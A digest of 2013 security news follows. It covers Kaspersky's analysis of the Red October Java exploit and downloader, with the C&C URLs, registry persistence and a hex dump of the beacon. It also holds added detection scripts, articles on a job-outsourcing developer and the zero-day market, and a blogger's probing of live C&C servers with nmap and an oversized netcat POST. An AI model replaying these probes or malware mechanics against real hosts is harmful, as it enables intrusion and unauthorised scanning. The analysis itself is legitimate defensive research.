  16. Red October - Java Exploit Delivery Vector Analysis GReAT Kaspersky Lab Expert Posted January 16, 13:00 GMT Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544). We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java. However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible for serving the '.jar' malcode archive, the line of code delivering the java exploit was commented out. Also, the related links, java, and the executable payload are proving difficult to track down to this point. The domain involved in the attack is presented only once in a public sandbox at malwr.com (Malwr - Analysis of c3b0d1403ba35c3aba8f4529f43fb300), and only on February 14th, the very same day that they registered the domain hotinfonews.com: [COLOR=#1f497d]Domain Name: HOTINFONEWS.COM Registrant: Privat Person Denis Gozolov (gozolov@mail.ru) Narva mnt 27 Tallinn Tallinn,10120 EE Tel. +372.54055298 Creation Date: 14-Feb-2012 Expiration Date: 14-Feb-2013 [/COLOR] Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components. We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer. 
Which may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing. Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East.

So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign. The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself.

Here is our PHP encryption routine to encrypt the URL for the downloader content:

And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':

Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the $files and $charset variables in the PHP script:

This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination's encryption routine is different from the obfuscation commonly used throughout Red October modules.
It further suggests that potentially this limited use package was developed separately from the rest for a specific target.

2nd stage of the attack: EXE, downloader

The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack.

Known file location: %TEMP%\javaln.exe
MD5: c3b0d1403ba35c3aba8f4529f43fb300

The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules.

Obfuscation layer disassembled

The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites:

Microsoft Home Page | Devices and Services
update.microsoft.com
Google

Once a valid connection is established, it continues to its main loop.

C&C server connection loop

Every 180 seconds the module sends a HTTP POST request to its C&C server.
The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php

The contents of the post request follow the following format:

id=%unique user ID, retrieved from the overlay of the file%&
A=%integer, indicates whether the autorun registry key was written%&
B=%0 or 1, indicates if user has administrative rights%&
C=%integer, level of privilege assigned to the current user%

00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|
00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|
00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|
00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|
00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|
00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|
00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|
00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|
00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|
00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|
000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|
000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|
000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|
000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|
000000e0 26 43 3d 32 |&C=2|

HTTP POST request sent to the C&C server

The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.
3rd stage of the attack: EXE, unknown

Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.

Conclusions

As more information about the Red October becomes available and third parties are publishing their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought. In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 years since this gang was active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups - an unusual thing. We will continue to monitor the situation and publish updates as the story uncovers.

Source: Red October - Java Exploit Delivery Vector Analysis - Securelist
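As an added illustration (not part of the Kaspersky write-up), the following Python parses a raw HTTP request and flags one that matches the javaln.exe check-in described above: the hardcoded host and path, and a form body carrying exactly the fields id, A, B and C with the value types the analysis lists. Both sample requests are constructed here; the id value is made up.

```python
"""Flag HTTP requests matching the javaln.exe C&C beacon format (added example)."""
import re
from typing import Dict, Optional
from urllib.parse import parse_qs

# Hardcoded C&C URL quoted in the analysis above.
C2_HOST = "www.dailyinfonews.net"
C2_PATH = "/reportdatas.php"
# The beacon body carries exactly these four form fields.
BEACON_KEYS = {"id", "A", "B", "C"}


def parse_http_request(raw: bytes) -> Dict:
    """Split a raw HTTP request into request line, headers (lower-cased keys) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body.decode("latin-1")}


def classify_beacon(req: Dict) -> Optional[Dict]:
    """Return the decoded beacon fields if `req` matches the downloader's check-in, else None."""
    if req["method"] != "POST":
        return None
    # The captured request uses the proxy-style absolute form "http://host:80/path";
    # accept the plain origin form "/path" plus a Host header as well.
    m = re.match(r"^(?:https?://([^/:\s]+)(?::\d+)?)?(/[^?\s]*)", req["target"])
    if not m:
        return None
    host = m.group(1) or req["headers"].get("host", "").split(":")[0]
    if host != C2_HOST or m.group(2) != C2_PATH:
        return None
    fields = parse_qs(req["body"], keep_blank_values=True)
    if set(fields) != BEACON_KEYS or any(len(v) != 1 for v in fields.values()):
        return None
    uid, a, b, c = (fields[k][0] for k in ("id", "A", "B", "C"))
    # id is an upper-case alphanumeric token; A and C are integers; B is 0 or 1.
    if not (re.fullmatch(r"[A-Z0-9]+", uid) and a.isdigit() and b in ("0", "1") and c.isdigit()):
        return None
    return {"id": uid, "autorun_written": int(a), "is_admin": b == "1",
            "privilege_level": int(c)}


# Constructed sample request in the layout of the captured beacon (id value is made up).
SAMPLE_BEACON = (
    b"POST http://www.dailyinfonews.net:80/reportdatas.php HTTP/1.0\r\n"
    b"Host: www.dailyinfonews.net:80\r\n"
    b"Content-length: 30\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"id=CONSTRUCTED0001&A=1&B=1&C=2"
)

# Constructed benign form post that must not be flagged.
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"user=alice&pass=secret"
)

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_BENIGN):
        print(classify_beacon(parse_http_request(sample)))
```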
17. Security audit finds dev OUTSOURCED his JOB to China to goof off at work

Cunning scheme netted him 'best in company' awards

By Iain Thomson in San Francisco
Posted in Business, 16th January 2013

A security audit of a US critical infrastructure company last year revealed that its star developer had outsourced his own job to a Chinese subcontractor and was spending all his work time playing around on the internet.

The firm's telecommunications supplier Verizon was called in after the company set up a basic VPN system with two-factor authentication so staff could work at home. The VPN traffic logs showed a regular series of logins to the company's main server from Shenyang, China, using the credentials of the firm's top programmer, "Bob".

"The company's IT personnel were sure that the issue had to do with some kind of zero day malware that was able to initiate VPN connections from Bob's desktop workstation via external proxy and then route that VPN traffic to China, only to be routed back to their concentrator," said Verizon. "Yes, it is a bit of a convoluted theory, and like most convoluted theories, an incorrect one."

After getting permission to study Bob's computer habits, Verizon investigators found that he had hired a software consultancy in Shenyang to do his programming work for him, and had FedExed them his two-factor authentication token so they could log into his account. He was paying them a fifth of his six-figure salary to do the work and spent the rest of his time on other activities.

The analysis of his workstation found hundreds of PDF invoices from the Chinese contractors and determined that Bob's typical work day consisted of:

9:00 a.m. – Arrive and surf Reddit for a couple of hours. Watch cat videos
11:30 a.m. – Take lunch
1:00 p.m. – Ebay time
2:00-ish p.m – Facebook updates, LinkedIn
4:30 p.m. – End-of-day update e-mail to management
5:00 p.m. – Go home

The scheme worked very well for Bob.
In his performance assessments by the firm's human resources department, he was the firm's top coder for many quarters and was considered expert in C, C++, Perl, Java, Ruby, PHP, and Python.

Further investigation found that the enterprising Bob had actually taken jobs with other firms and had outsourced that work too, netting him hundreds of thousands of dollars in profit as well as lots of time to hang around on internet messaging boards and checking for a new . Bob is no longer employed by the firm. ®

Source: Security audit finds dev OUTSOURCED his JOB to China to goof off at work • The Register

Crafty guy.
18. Cyberwar’s Gray Market

Should the secretive hacker zero-day exploit market be regulated?

By Ryan Gallagher | Posted Wednesday, Jan. 16, 2013

Behind computer screens from France to Fort Worth, Texas, elite hackers hunt for security vulnerabilities worth thousands of dollars on a secretive unregulated marketplace. Using sophisticated techniques to detect weaknesses in widely used programs like Google Chrome, Java, and Flash, they spend hours crafting “zero-day exploits”—complex codes custom-made to target a software flaw that has not been publicly disclosed, so they can bypass anti-virus or firewall detection to help infiltrate a computer system.

Like most technologies, the exploits have a dual use. They can be used as part of research efforts to help strengthen computers against intrusion. But they can also be weaponized and deployed aggressively for everything from government spying and corporate espionage to flat-out fraud. Now, as cyberwar escalates across the globe, there are fears that the burgeoning trade in finding and selling exploits is spiralling out of control—spurring calls for new laws to rein in the murky trade.

Some legitimate companies operate in a legal gray zone within the zero-day market, selling exploits to governments and law enforcement agencies in countries across the world. Authorities can use them covertly in surveillance operations or as part of cybersecurity or espionage missions. But because sales are unregulated, there are concerns that some gray market companies are supplying to rogue foreign regimes that may use exploits as part of malicious targeted attacks against other countries or opponents. There is also an anarchic black market that exists on invite-only Web forums, where exploits are sold to a variety of actors—often for criminal purposes.

The importance of zero-day exploits, particularly to governments, has become increasingly apparent in recent years.
Undisclosed vulnerabilities in Windows played a crucial role in how Iranian computers were infiltrated for surveillance and sabotage when the country’s nuclear program was attacked by the Stuxnet virus (an assault reportedly launched by the United States and Israel). Last year, at least eight zero days in programs like Flash and Internet Explorer were discovered and linked to a Chinese hacker group dubbed the “Elderwood gang,” which targeted more than 1,000 computers belonging to corporations and human rights groups as part of a shady intelligence-gathering effort allegedly sponsored by China. The most lucrative zero days can be worth hundreds of thousands of dollars in both the black and gray markets. Documents released by Anonymous in 2011 revealed Atlanta-based security firm Endgame Systems offering to sell 25 exploits for $2.5 million. Emails published alongside the documents showed the firm was trying to keep “a very low profile” due to “feedback we've received from our government clients.” (In keeping with that policy, Endgame didn’t respond to questions for this story.) But not everyone working in the business of selling software exploits is trying to fly under the radar—and some have decided to blow the whistle on what they see as dangerous and irresponsible behavior within their secretive profession. Adriel Desautels, for one, has chosen to speak out. The 36-year-old “exploit broker” from Boston runs a company called Netragard, which buys and sells zero days to organizations in the public and private sectors. (He won’t name names, citing confidentiality agreements.) The lowest-priced exploit that Desautels says he has sold commanded $16,000; the highest, more than $250,000. Unlike other companies and sole traders operating in the zero-day trade, Desautels has adopted a policy to sell his exploits only domestically within the United States, rigorously vetting all those he deals with. 
If he didn’t have this principle, he says, he could sell to anyone he wanted—even Iran or China—because the field is unregulated. And that’s exactly why he is concerned. “As technology advances, the effect that zero-day exploits will have is going to become more physical and more real,” he says. “The software becomes a weapon. And if you don’t have controls and regulations around weapons, you’re really open to introducing chaos and problems.” Desautels says he knows of “greedy and irresponsible” people who “will sell to anybody,” to the extent that some exploits might be sold by the same hacker or broker to two separate governments not on friendly terms. This can feasibly lead to these countries unwittingly targeting each other’s computer networks with the same exploit, purchased from the same seller. “If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops—it’s the same concept,” he says. The position Desautels has taken casts him as something of an outsider within his trade. France’s Vupen, one of the foremost gray-market zero-day sellers, takes a starkly different approach. Vupen develops and sells exploits to law enforcement and intelligence agencies across the world to help them intercept communications and conduct “offensive cyber security missions,” using what it describes as “extremely sophisticated codes” that “bypass all modern security protections and exploit mitigation technologies.” Vupen’s latest financial accounts show it reported revenue of about $1.2 million in 2011, an overwhelming majority of which (86 percent) was generated from exports outside France. Vupen says it will sell exploits to a list of more than 60 countries that are members or partners of NATO, provided these countries are not subject to any export sanctions. 
(This means Iran, North Korea, and Zimbabwe are blacklisted—but the likes of Kazakhstan, Bahrain, Morocco, and Russia are, in theory at least, prospective customers, as they are not subject to any sanctions at this time.) “As a European company, we exclusively work with our allies and partners to help them protect their democracies and citizens against threats and criminals,” says Chaouki Bekrar, Vupen’s CEO, in an email. He adds that even if a given country is not on a sanctions list, it doesn’t mean Vupen will automatically work with it, though he declines to name specific countries or continents where his firm does or does not have customers. Vupen’s policy of selling to a broad range of countries has attracted much controversy, sparking furious debate around zero-day sales, ethics, and the law. Chris Soghoian of the ACLU—a prominent privacy and security researcher who regularly spars with Vupen CEO Bekrar on Twitter—has accused Vupen of being “modern-day merchants of death” selling “the bullets for cyberwar.” “Just as the engines on an airplane enable the military to deliver a bomb that kills people, so too can a zero day be used to deliver a cyberweapon that causes physical harm or loss of life,” Soghoian says in an email. He is astounded that governments are “sitting on flaws” by purchasing zero-day exploits and keeping them secret. This ultimately entails “exposing their own citizens to espionage,” he says, because it means that the government knows about software vulnerabilities but is not telling the public about them. Some claim, however, that the zero-day issue is being overblown and politicized. “You don’t need a zero day to compromise the workstation of an executive, let alone an activist,” says Wim Remes, a security expert who manages information security for Ernst & Young. Others argue that the U.S. government in particular needs to purchase exploits to keep pace with what adversaries like China and Iran are doing. 
“If we’re going to have a military to defend ourselves, why would you disarm our military?” says Robert Graham at the Atlanta-based firm Errata Security. “If the government can’t buy exploits on the open market, they will just develop them themselves,” Graham says. He also fears that regulation of zero-day sales could lead to a crackdown on legitimate coding work. “Plus, digital arms don’t exist—it’s an analogy. They don’t kill people. Bad things really don’t happen with them.” * * * So are zero days really a danger? The overwhelming majority of compromises of computer systems happen because users failed to update software and patch vulnerabilities that are already known about. However, there are a handful of cases in which undisclosed vulnerabilities—that is, zero days—have been used to target organizations or individuals. It was a zero day, for instance, that was recently used by malicious hackers to compromise Microsoft’s Hotmail and steal emails and details of the victims' contacts. Last year, it was reported that a zero day was used to target a flaw in Internet Explorer and hijack Gmail accounts. Noted “offensive security” companies such as Italy’s Hacking Team and the England-based Gamma Group are among those to make use of zero-day exploits to help law enforcement agencies install advanced spyware on target computers—and both of these companies have been accused of supplying their technologies to countries with an authoritarian bent. Tracking and communications interception can have serious real-world consequences for dissidents in places like Iran, Syria, or the United Arab Emirates. In the wrong hands, it seems clear, zero days could do damage. 
This potential has been recognized in Europe, where Dutch politician Marietje Schaake has been crusading for groundbreaking new laws to curb the trade in what she calls “digital weapons.” Speaking on the phone from Strasbourg, France*, Schaake tells me she’s concerned about security exploits, particularly where they are being sold with the intent to help enable access to computers or mobile devices not authorized by the owner. She adds that she is considering pressing for the European Commission, the EU’s executive body, to bring in a whole new regulatory framework that would encompass the trade in zero days, perhaps by looking at incentives for companies or hackers to report vulnerabilities that they find. Such a move would likely be welcomed by the handful of organizations already working to encourage hackers and security researchers to responsibly disclose vulnerabilities they find instead of selling them on the black or gray markets. The Zero Day Initiative, based in Austin, Texas, has a team of about 2,700 researchers globally who submit vulnerabilities that are then passed on to software developers so they can be fixed. ZDI, operated by Hewlett-Packard, runs competitions in which hackers can compete for a pot of more than $100,000 in prize funds if they expose flaws. “We believe our program is focused on the greater good,” says Brian Gorenc, a senior security researcher who works with the ZDI. Yet for some hackers, disclosing vulnerabilities directly to developers lacks appeal because greater profits can usually always be made elsewhere. 
When I ask Vupen’s Bekrar what he thinks of responsible disclosure programs, he is critical of “lame” rewards on offer and predicts that for this reason an increasing number of skilled hackers in the future will “keep their research private to sell it to governments.” It may also be the case that, no matter what the financial incentive, for some it will always be more of a thrill to shun the “responsible.” So even if regulators internationally were to somehow curb exploit sales, it’s likely it would only have a tangible impact on legitimate companies like Vupen, Endgame, Netragard, and others. There would remain a burgeoning black market, in which vulnerabilities are sold off to the highest bidder. This market exists in an anarchic pocket of the Internet, a sort of Wild West, where legality is rarely of paramount importance—as former Washington Post reporter Brian Krebs recently found out for himself. Krebs, who regularly publishes scoops about zero days on his popular blog, has on several occasions been besieged by hackers after writing about vulnerabilities circulating on the black market. Krebs says his website came under attack last year after he exposed a zero day that was being sold on an exclusive, invite-only Web forum. “They don’t like the attention,” he says. The hackers were able to find Krebs’ home IP address. Then, they began targeting his Internet connection and taunting him. Krebs was eventually forced to change his router and has since signed up for a service that helps protect his online identity. But he says he still receives malware by email “all the time.” It’s difficult to imagine how the aggressive black market that Krebs encountered could ever be efficiently curtailed by laws. That is why the best way for vulnerabilities to be fully eliminated—or at least drastically reduced—would perhaps be to place a greater burden on the software developers to raise standards. 
If only developers would invest more in protecting user security by designing better, safer software and by swiftly patching security flaws, the zero-day marketplace would likely be hit by a crushing recession. At present, however, that remains an unlikely prospect.

And unfortunately it seems there’s not a great deal you can do about it, other than to be aware of the risk. “Most organizations are one zero day away from compromise,” Krebs says. “If it’s a widely used piece of software, you’ve just got to assume these days that it’s got vulnerabilities that the software vendors don’t know about—but the bad guys do.”

This article arises from Future Tense, a collaboration among Arizona State University, the New America Foundation, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, visit the Future Tense blog and the Future Tense home page. You can also follow us on Twitter.

Source: Zero-day exploits: Should the hacker gray market be regulated? - Slate Magazine
19. The Hunt For Red October

Posted on January 14, 2013 by infodox

The Hunt For Red October – The Job So Far

Today, Kaspersky Labs released a report on a long running advanced persistent threat* (APT) they had uncovered, revealing a long running cyber-espionage campaign targeting a broad and diverse mixture of both countries and sectors. As usual the fingers were pointed at China (Chinese exploit chains, Chinese hosts used…), however, there was also some evidence to implicate Russian involvement, which was speculated to be a “False Flag” attempt.

An associate of mine, after reading the report, came up with a SHODAN dork rather quickly to identify the C&C hosts.

http://www.shodanhq.com/search?q=Last-Modified%3A+%27Tue%2C+21+Feb+2012+09%3A00%3A41+GMT%27+Apache

After a few seconds, he realized that the etag header on all of them was the same, leading to the following query:

http://www.shodanhq.com/?q=8c0bf6-ba-4b975a53906e4

SO, Fingerprinting information: just check for etag = 8c0bf6-ba-4b975a53906e4

The “offending IPs” are as follows. These are used as proxies it appears.

31.41.45.119
37.235.54.48
188.40.19.244
141.101.239.225
46.30.41.112
188.72.218.213
31.41.45.9

So, we now have a list of 7 C&C hosts. Time to break out nmap and see what they are doing. The following scan string was used for an initial scan of all the hosts.

sudo nmap -sSUV -A -O -vvv 3 -oA huntingredoctober 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9

The tarball of report files is available here: huntingredoctober.tar

The hosts identified as alive are as follows:

37.235.54.48
188.40.19.244
31.41.45.119

The other four were not responsive, probably taken down already. No fun.

Once I had identified which hosts were, in fact, still alive (while the rest of the bloody slow scan was running), I decided to see what lay behind the scenes on these hosts, doing the “daft” thing of connecting to port 80 using my web browser.
The clench factor was rather intense as I half expected to be owned by about half a dozen super 0day exploits on crack while doing so. Instead, I was redirected harmlessly to the BBC. The following HTML code was responsible for this redirect, which I thought was an incredibly clever way to hide their true purpose.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>BBC – Homepage</title>
<meta http-equiv="REFRESH" content="0;url=http://www.bbc.com/"></HEAD>
</HTML>

Back to the nmap scan (it had FINALLY completed), the following was very interesting.

PORT STATE SERVICE VERSION
80/tcp open http?
|_http-title: BBC – Homepage
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
138/udp open|filtered netbios-dgm
520/udp filtered route

All of the servers looked like this. They all had those three ports – 80, 138, 520, open or filtered. The rest were all closed. The 188.40.19.244 host began sending me RST packets midway through my scan, but regardless, the work went on.

I decided I was going to look at the webserver from information Kaspersky published. Sending GET requests to the /cgi-bin/ms/check CGI script produced a 500 internal server error, as did other CGI scripts. This was interesting in that they told me to email eaxample@example.com about it. I did so immediately, being a good netizen. Note the misspelling of example – “eaxample”.

Emailing the big heckers.

The email delivered

Apparently the mail was delivered successfully, so I hope they reply soon with an explanation.

On to more serious things, another analyst working with me uncovered another interesting thing. He went and did the following:

printf "POST /cgi-bin/nt/th HTTP/1.1\r\nHost: 37.235.54.48\r\nContent-Length: 10000\r\n\r\n%s" `perl -e 'print "A" x 20000'` | torsocks nc 37.235.54.48 80

Now, he had figured out the page would 500, unless a content length was set.
So, he set a long Content Length, and sent an even longer POST request. The result was nothing short of fascinating.

HTTP/1.1 200 OK
Date: Mon, 14 Jan 2013 19:18:07 GMT
Server: Apache
Content-length: 0
Content-Type: text/html

HTTP/1.1 414 Request-URI Too Large
Date: Mon, 14 Jan 2013 19:18:08 GMT
Server: Apache
Content-Length: 250
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>414 Request-URI Too Large</title>
</head><body>
<h1>Request-URI Too Large</h1>
<p>The requested URL's length exceeds the capacity limit for this server.<br />
</p>
</body></html>

“Look mom! Two headers!”. Seriously, this is interesting. First it gives a 200 OK, then a second later something else says “LOL, NO”. The delay makes us think the proxy is saying “OK”, then the real C&C is complaining. The fact it complains about a request URL, and the length being in the POST request, makes me think the final data-to-C&C might be sent as a GET. Just a theory.

— TO BE CONTINUED —

// This post suffered a bad case of myself and fellow researchers having a lulz about it, and my cat straying onto my keyboard. It is a work in progress.

— Continuing the hunt —

Today we retrieved new intelligence (or rather, last night, but I could not act on this intel) from HD Moore of Metasploit project that more C&C servers had been located. The following link is the list of IP addresses.

http://pastie.org/private/ytbrfmqpn8alfjfrnbhcbw

So, it was decided (once the cat had gotten the hell off my keyboard) to investigate this list. @craiu provided us with the tip “check out “1c824e-ba-4bcd8c8b36340” and “186-1333538825000” too.”, so we will act upon this later.

I decided, seeing as my internet went down for a while, to test out my Python skillz, and whipped up a quick program I named “SONAR”, which simply attempted a TCP connection to port 80 on the suspected C&C servers and logged responsive ones to a file. Source code attached.
sonar.tar

Sonar...

I could have used nmap, but that would have been unimaginative and, frankly, no fun. And who says hunting cyber-spies (So much worse than normal spies, ‘cos they got the dreaded CYBER in there) is not supposed to be bloody fun anyway, not me for certain!

We quickly reduced the list to a “lot less than we had”, and I queued them up for nmap scanning, which has yet to be done, as the sysadmins on the network I am using do not like when I portscan things for some odd reason. Or when I use SSH, or email. Anyway, I digress.

So far, more C&C servers had been identified, and more “Fingerprinting” methods had been developed. I am considering writing a patch to sonar.py to dump out the etag data along with working IPs, but that can wait til later. A simple HTTP GET / should do the trick, with a few regexes.

We also obtained a list of MD5 hashes from malware.lu showing samples of Red October they have in their repo – see here -> 053d92ba6413ea31af9898e7d57692b68e42117a61b2d6de4556e9b707314fd7 16d5114b8613f9 - Pastebin.com so those were queued up for downloading (once on a non monitored by college network) for some analysis using IDA. That is to be tonight's job – a quick and dirty first pass run of analysing these things.

* For the record, I think APT is another FUD term… But oh well, it has become “a thing”.

Source: The Hunt For Red October | Insecurety Research
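As an added example (my code, not the author's sonar.py), here is an offline parser for the "two headers" behaviour seen above: it cuts a raw server-to-client byte stream into individual HTTP responses by Content-Length, then checks each response's ETag and Last-Modified headers against the fingerprints the post quotes, which is the etag-dumping patch the author describes. The sample stream is constructed to mirror the captured 200-then-414 exchange, with the ETag and Last-Modified headers added and the 414 body shortened for illustration.

```python
"""Split a raw HTTP response stream and fingerprint it against the indicators quoted above (added example)."""
from typing import Dict, List

# ETag values and Last-Modified header quoted in the post.
KNOWN_ETAGS = {"8c0bf6-ba-4b975a53906e4", "1c824e-ba-4bcd8c8b36340", "186-1333538825000"}
KNOWN_LAST_MODIFIED = "Tue, 21 Feb 2012 09:00:41 GMT"


def split_responses(stream: bytes) -> List[Dict]:
    """Cut a server-to-client byte stream into HTTP responses.

    Each body is sized by its Content-Length (treated as 0 when absent), so a
    200 with "Content-length: 0" followed by a 414 yields two entries.
    """
    responses = []
    pos = 0
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        status_line = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()  # header names are case-insensitive
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        responses.append({"version": status_line[0], "status": int(status_line[1]),
                          "headers": headers, "body": stream[body_start:body_start + length]})
        pos = body_start + length
    return responses


def fingerprint(resp: Dict) -> List[str]:
    """Names of the quoted indicators present in one response's headers."""
    hits = []
    etag = resp["headers"].get("etag", "").strip('"')  # ETag values are normally quoted
    if etag in KNOWN_ETAGS:
        hits.append("etag:" + etag)
    if resp["headers"].get("last-modified") == KNOWN_LAST_MODIFIED:
        hits.append("last-modified")
    return hits


def assess_stream(stream: bytes) -> Dict:
    """Summarise one captured exchange: status codes, double-response flag, indicator hits."""
    responses = split_responses(stream)
    return {
        "statuses": [r["status"] for r in responses],
        "double_response": len(responses) > 1,  # the "two headers" behaviour seen above
        "matches": [hit for r in responses for hit in fingerprint(r)],
    }


# Constructed stream mirroring the captured 200-then-414 exchange (headers added, body shortened).
SAMPLE_STREAM = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 14 Jan 2013 19:18:07 GMT\r\n"
    b"Server: Apache\r\n"
    b'ETag: "8c0bf6-ba-4b975a53906e4"\r\n'
    b"Last-Modified: Tue, 21 Feb 2012 09:00:41 GMT\r\n"
    b"Content-length: 0\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"HTTP/1.1 414 Request-URI Too Large\r\n"
    b"Date: Mon, 14 Jan 2013 19:18:08 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 16\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<html>414</html>"
)

# Constructed ordinary response that should produce no hits.
SAMPLE_BENIGN = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b'ETag: "deadbeef-1"\r\n'
    b"Content-Length: 2\r\n"
    b"\r\n"
    b"ok"
)

if __name__ == "__main__":
    print(assess_stream(SAMPLE_STREAM))
    print(assess_stream(SAMPLE_BENIGN))
```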
20. Fedora 18 released

From: Robyn Bergeron <rbergero-AT-redhat.com>
To: announce-AT-lists.fedoraproject.org
Subject: Announcing the release of Fedora 18.
Date: Tue, 15 Jan 2013 10:03:18 -0500 (EST)

The Fedora Project is incredibly delighted to announce the release of Fedora 18 ("Spherical Cow"). Heck, we'd even say that getting this release to you has been a mooving experience.

Fedora is a leading-edge, free and open source operating system that continues to deliver innovative features to many users, with a new release about every six months...or so. But no bull: Spherical Cow is, of course, Fedora's best release yet. You'll go through the hoof when you hear about the Grade A Prime F18 features. You can always cownt on us to bring you the best features first.

Can't wait for a taste? You can get started downloading now:
http://fedoraproject.org/get-fedora

Detailed information about this release can be seen in the release notes:
http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas...

== What's New in Fedora 18? ==

The Fedora Project takes great pride in being able to show off features for all types of use cases, including traditional desktop users, systems administration, development, the cloud, and many more. But a few new features are guaranteed to be seen by nearly anyone installing Fedora and are improvements that deserve to be called out on their own.

The user interface for Fedora's installation software, Anaconda, has been completely re-written from the ground up. Making its debut in Fedora 18, the new UI introduces major improvements to the installation experience. It uses a hub-and-spoke model that makes installation easier for new users, offering them concise explanations about their choices.
